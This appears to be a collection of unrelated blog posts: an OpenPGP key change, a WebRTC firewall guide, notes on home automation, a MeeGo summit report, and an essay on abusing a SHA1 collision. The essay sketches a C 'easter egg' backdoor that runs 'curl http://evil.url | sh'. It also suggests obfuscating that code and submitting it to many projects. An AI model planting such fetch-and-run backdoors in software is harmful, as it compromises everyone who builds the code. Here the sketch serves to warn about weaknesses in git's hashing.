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9 August 2023

Antoine Beaupr : OpenPGP key transition

This is a short announcement to say that I have changed my main OpenPGP key. A signed statement is available with the cryptographic details but, in short, the reason is that I stopped using my old YubiKey NEO that I have worn on my keyring since 2015. I now have a YubiKey 5 which supports ED25519 which features much shorter keys and faster decryption. It allowed me to move all my secret subkeys on the key (including encryption keys) while retaining reasonable performance. I have written extensive documentation on how to do that OpenPGP key rotation and also YubiKey OpenPGP operations.

Warning on storing encryption keys on a YubiKey People wishing to move their private encryption keys to such a security token should be very careful as there are special precautions to take for disaster recovery. I am toying with the idea of writing an article specifically about disaster recovery for secrets and backups, dealing specifically with cases of death or disabilities.

Autocrypt changes One nice change is the impact on Autocrypt headers, which are considerably shorter. Before, the header didn't even fit on a single line in an email, it overflowed to five lines:
Autocrypt:; prefer-encrypt=nopreference;
After the change, the entire key fits on a single line, neat!
Autocrypt:; prefer-encrypt=nopreference;
Note that I have implemented my own kind of ridiculous Autocrypt support for the Notmuch Emacs email client I use, see this elisp code. To import keys, I pipe the message into this script which is basically just:
sq autocrypt decode   gpg --import
... thanks to Sequoia best-of-class Autocrypt support.

Note on OpenPGP usage While some have claimed OpenPGP's death, I believe those are overstated. Maybe it's just me, but I still use OpenPGP for my password management, to authenticate users and messages, and it's the interface to my YubiKey for authenticating with SSH servers. I understand people feel that OpenPGP is possibly insecure, counter-intuitive and full of problems, but I think most of those problems should instead be attributed to its current flagship implementation, GnuPG. I have tried to work with GnuPG for years, and it keeps surprising me with evilness and oddities. I have high hopes that the Sequoia project can bring some sanity into this space, and I also hope that RFC4880bis can eventually get somewhere so we have a more solid specification with more robust crypto. It's kind of a shame that this has dragged on for so long, but Update: there's a separate draft called openpgp-crypto-refresh that might actually be adopted as the "OpenPGP RFC" soon! And it doesn't keep real work from happening in Sequoia and other implementations. Thunderbird rewrote their OpenPGP implementation with RNP (which was, granted, a bumpy road because it lost compatibility with GnuPG) and Sequoia now has a certificate store with trust management (but still no secret storage), preliminary OpenPGP card support and even a basic GnuPG compatibility layer. I'm also curious to try out the OpenPGP CA capabilities. So maybe it's just because I'm becoming an old fart that doesn't want to change tools, but so far I haven't seen a good incentive in switching away from OpenPGP, and haven't found a good set of tools that completely replace it. Maybe OpenSSH's keys and CA can eventually replace it, but I suspect they will end up rebuilding most of OpenPGP anyway, just more slowly. If they do, let's hope they avoid the mistakes our community has done in the past at least...

28 March 2020

Fran ois Marier: How to get a direct WebRTC connections between two computers

WebRTC is a standard real-time communication protocol built directly into modern web browsers. It enables the creation of video conferencing services which do not require participants to download additional software. Many services make use of it and it almost always works out of the box. The reason it just works is that it uses a protocol called ICE to establish a connection regardless of the network environment. What that means however is that in some cases, your video/audio connection will need to be relayed (using end-to-end encryption) to the other person via third-party TURN server. In addition to adding extra network latency to your call that relay server might overloaded at some point and drop or delay packets coming through. Here's how to tell whether or not your WebRTC calls are being relayed, and how to ensure you get a direct connection to the other host.

Testing basic WebRTC functionality Before you place a real call, I suggest using the official test page which will test your camera, microphone and network connectivity. Note that this test page makes use of a Google TURN server which is locked to particular HTTP referrers and so you'll need to disable privacy features that might interfere with this:
  • Brave: Disable Shields entirely for that page (Simple view) or allow all cookies for that page (Advanced view).
  • Firefox: Ensure that is set to false in about:config, which it is by default.
  • uMatrix: The "Spoof Referer header" option needs to be turned off for that site.

Checking the type of peer connection you have Once you know that WebRTC is working in your browser, it's time to establish a connection and look at the network configuration that the two peers agreed on. My favorite service at the moment is Whereby (formerly, so I'm going to use that to connect from two different computers:
  • canada is a laptop behind a regular home router without any port forwarding.
  • siberia is a desktop computer in a remote location that is also behind a home router, but in this case its internal IP address ( is set as the DMZ host.

Chromium For all Chromium-based browsers, such as Brave, Chrome, Edge, Opera and Vivaldi, the debugging page you'll need to open is called chrome://webrtc-internals. Look for RTCIceCandidatePair lines and expand them one at a time until you find the one which says:
  • state: succeeded (or state: in-progress)
  • nominated: true
  • writable: true
Then from the name of that pair (N6cxxnrr_OEpeash in the above example) find the two matching RTCIceCandidate lines (one local-candidate and one remote-candidate) and expand them. In the case of a direct connection, I saw the following on the remote-candidate:
  • ip shows the external IP address of siberia
  • port shows a random number between 1024 and 65535
  • candidateType: srflx
and the following on local-candidate:
  • ip shows the external IP address of canada
  • port shows a random number between 1024 and 65535
  • candidateType: prflx
These candidate types indicate that a STUN server was used to determine the public-facing IP address and port for each computer, but the actual connection between the peers is direct. On the other hand, for a relayed/proxied connection, I saw the following on the remote-candidate side:
  • ip shows an IP address belonging to the TURN server
  • candidateType: relay
and the same information as before on the local-candidate.

Firefox If you are using Firefox, the debugging page you want to look at is about:webrtc. Expand the top entry under "Session Statistics" and look for the line (should be the first one) which says the following in green:
  • ICE State: succeeded
  • Nominated: true
  • Selected: true
then look in the "Local Candidate" and "Remote Candidate" sections to find the candidate type in brackets.

Firewall ports to open to avoid using a relay In order to get a direct connection to the other WebRTC peer, one of the two computers (in my case, siberia) needs to open all inbound UDP ports since there doesn't appear to be a way to restrict Chromium or Firefox to a smaller port range for incoming WebRTC connections. This isn't great and so I decided to tighten that up in two ways by:
  • restricting incoming UDP traffic to the IP range of siberia's ISP, and
  • explicitly denying incoming to the UDP ports I know are open on siberia.
To get the IP range, start with the external IP address of the machine (I'll use the IP address of my blog in this example: and pass it to the whois command:
$ whois   grep CIDR
To get the list of open UDP ports on siberia, I sshed into it and ran nmap:
$ sudo nmap -sU localhost
Starting Nmap 7.60 ( ) at 2020-03-28 15:55 PDT
Nmap scan report for localhost (
Host is up (0.000015s latency).
Not shown: 994 closed ports
631/udp   open filtered ipp
5060/udp  open filtered sip
5353/udp  open          zeroconf
Nmap done: 1 IP address (1 host up) scanned in 190.25 seconds
I ended up with the following in my /etc/network/iptables.up.rules (ports below 1024 are denied by the default rule and don't need to be included here):
# Deny all known-open high UDP ports before enabling WebRTC for canada
-A INPUT -p udp --dport 5060 -j DROP
-A INPUT -p udp --dport 5353 -j DROP
-A INPUT -s -p udp --dport 1024:65535 -j ACCEPT

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:
7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:
3*/LN  \.A
5*\LN   \.
5*\7N   /.
3*/7N  /.V
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
/* Call this at the top of main() */
check_display_easter_egg (char **argv)  
    if (strcmp(argv[1], "--easter-egg") == 0)
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url   sh");
Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:
  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

31 January 2015

John Goerzen: First Steps with Home Automation and LED Lighting

I ve been thinking about home automation automating lights, switches, thermostats, etc. for years. Literally decades, in fact. When I was a child, my parents had a RadioShack X10 control module and one or two target devices. I think I had fun giving people a light show turning on or off one switch and one outlet remotely. But I was stuck there are a daunting number of standards for home automation these days. Zigbee, UPB, Z-Wave, Insteon, and all sorts of Wifi-enabled things that aren t really compatible with each other (hellooooo, Nest) or have their own ecosystem that isn t all that open (helloooo, Apple). Frankly I don t think that Wifi is a great home automation protocol; its power drain completely prohibits it being used in a lot of ways. Earlier this month, my awesome employer had our annual meeting and as part of that our technical teams had some time for anyone to talk about anything geeky. I used my time to talk about flying quadcopters, but two of my colleagues talked about home automation. I had enough to have a place to start, and was hooked. People use these systems to do all sorts of things: intelligently turn off lights when rooms aren t occupied, provide electronic door locks (unlockable via keypad, remote, or software), remote control lighting and heating/cooling via smartphone apps, detect water leakage, control switches with awkward wiring environments, buttons to instantly set multiple switches to certain levels for TV watching, turning off lights left on, etc. I even heard examples of monitoring a swamp cooler to make sure it is being used correctly. The possibilities are endless, and my geeky side was intrigued. Insteon and Z-Wave Based on what I heard from my colleagues, I decided to adopt a hybrid network consisting of Insteon and Z-Wave. Both are reliable protocols (with ACKs and retransmit), so they work far better than X10 did. Both have all sorts of controls and sensors available (browse around on for some ideas). Insteon is a particularly interesting system an integrated dual-mesh network. It has both powerline and RF signaling, and most hardwared Insteon devices act as repeaters for both the wired and RF network simultaneously. Insteon packets contain a maximum hop count that is decremented after each relay, and the packets repeat in such as way that they collide and strengthen one another. There is no need to maintain routing tables or anything like that; it simply scales nicely. This system addresses all sorts of potential complexities. It addresses the split-phase problem of powerline-only systems, but using an RF bridge. It addresses long distances and outbuildings by using the powerline signaling. I found it to work quite well. The downside to Insteon is that all the equipment comes from one vendor: Insteon. If you don t like their thermostat or motion sensor, you don t have any choice. Insteon devices can be used entirely without a central controller. Light switches can talk to each other directly, and you can even set them up so that one switch controls dozens of others, if you have enough patience to go around your house pressing tiny set buttons. Enter Z-Wave. Z-Wave is RF-only, and while it is also a mesh network, it is source-routed, meaning that if you move devices around, you have to heal your network as all your nodes have to re-learn the path to each other. It also doesn t have the easy distance traversal of Insteon, of course. On the other hand, hundreds of vendors make Z-Wave products, and they mostly interoperate well. Z-Wave is said to scale practically to maybe two or three dozen devices, which would have been an issue for me, buut with Insteon doing the heavy lifting and Z-Wave filling in the gaps, it s worked out well. Controlling it all While both Insteon (and, to a certain extent, Z-Wave) devices can control each other, to really spread your wings, you need more centralized control. This lets you have programs that do things like if there s motion in the room on a weekday and it s dark outside, then turn on a light, and turn it back off 5 minutes later. Insteon has several options. One, you can buy their power line modem (PLM). This can be hooked up to a PC to run either Insteon s proprietary software, or something open-source like MisterHouse, written in Perl. Or you can hook it up to a controller I ll mention in a minute. Those looking for a fairly simpe controller might get the Insteon 2242-222 Hub, which has the obligatory smartphone app and basic schedules. For more sophisticated control, my friend recommended the ISY-994i controller. Not only does it have a lot more capable programming language (though still frustrating), it supports both Insteon and Z-Wave in an integrated box, and has a comprehensive REST API for integrating with other things. I went this route. First step: LED lighting I began my project by replacing my light bulbs with LEDs. I found that I could get Cree 4-Flow 60W equivs for $10 at Home Depot. They are dimmable, a key advantage over CFL, and also maintain their brightness throughout their life far better. As I wanted to install dimmer switches, I got a combination of Cree 60W bulbs, Cree TW bulbs (which have a better color spectrum coverage for more true colors), and Cree 100W equiv bulbs for places I needed more coverage. I even put in a few LED flood lights to replace my can lights. Overall I was happy with the LEDs. They are a significant improvement over the CFLs I had been using, and use even less power to boot. I have had issues with three Cree bulbs, though: one arrived broken, and two others have had issues such as being quite dim. They have a good warranty, but it seems their QA could be better. Also, they can have a tendency to flickr when dimmed, though this plagues virtually all LED bulbs. I had done quite a bit of research. CNET has some helpful brightness guides, and Insteon has a color temperature chart. CNET also had a nifty in-depth test of LED bulbs. Second step: switches Once the LED bulbs were in place, I was then able to start installing smart switches. I picked up Insteon s basic switch, the SwitchLinc 2477D at Menard s. This is a dimmable switch and requires a neutral wire in the box, but acts as a dual-band repeater for the system as well. The way Insteon switches work, they can be standalone, or controllers, responders, or both in a scene . A scene is where multiple devices act together. You can create virtual 3-way switches in a scene, or more complicated things where different lights are turned on at different levels. Anyhow, these switches worked out quite well. I have a few boxes where there is no neutral wire, so I had to use the Insteon SwitchLinc 2474D in them. That switch is RF-only and is supposed to have a minimum load of 20W, though they seemed to work OK albeit with limited range and the occasional glitch with my LEDs. There is also the relay-based SwitchLinc 2477S for use with non-dimmable lights, fans, etc. You can also get plug-in modules for controlling lamps and such. I found the Insteon devices mostly lived up to their billing. Occasionally I could provoke a glitch by changing from dimming to brightening in rapid succession on a remote switch controlling a load on a distant one. Twice I had to power cycle an Insteon switch that got confused (rather annoying when they re hardwared). Other than that, though, it s been solid. From what I gather, this stuff isn t ever quite as reliable as a 1950s mechanical switch, but at least in this price range, this is about as good as it gets these days. Well, this post got quite long, so I will have to follow up with part 2 in a little while. I intend to write about sensors and the Z-Wave network (which didn t work quite as easily as Insteon), as well as programming the ISY and my lessons learned along the way.

16 April 2011

Timo Jyrinki: MeeGo Summit FI Days 1 & 2

MeeGo Summit FI is now nearing completion, with several keynotes and other presentations, Meegathon 24h contest just coming to an end and a lot of interesting discussions had. See full program for details. Yesterday was a hugely energetic day, but today the lack of sleep starts to kick in a bit at least for me.

Some highlights via photos:

Keynote venue was a movie theater

MeeGo status update by Valtteri Halla / Intel - talking among else about tablets, IVI, and the 20 person team at Nokia doing MeeGo(.com) for N900 phone

Mikko Terho / Nokia - "Internet for the next billion => Qt good candidate", "code wins politics and standards"

Carsten Munk / Nomovok - "Hacking your existence: the importance of open-ended devices in the MeeGo world"

In addition to MeeGo tablet demonstrations a Wayland compositor was demoed by a Nomovok employee.

One of the many Qt / QML related talks was held by Tapani Mikola / Nokia

Evening party

Day 2 started with a few more presentations and Finhack event launching in the Protomo room as well

Still remaining for the day are Meegathon demonstrations (well actually I'm right now already following those while finishing this - cool demos!) , Meegathon awards, a panel discussion on "MeeGo, Nokia, Finns - finished? Can MeeGo be important in Finland without being inside Nokia's core?", BoF sessions and finally Intel AppUp Application Lab including some MeeGo table give-outs.

Thanks to organizers, many of whom were volunteers. The event has been running completely smoothly, coming not as a big surprise after the hugely successful last summer's Akademy 2010 also held in Tampere.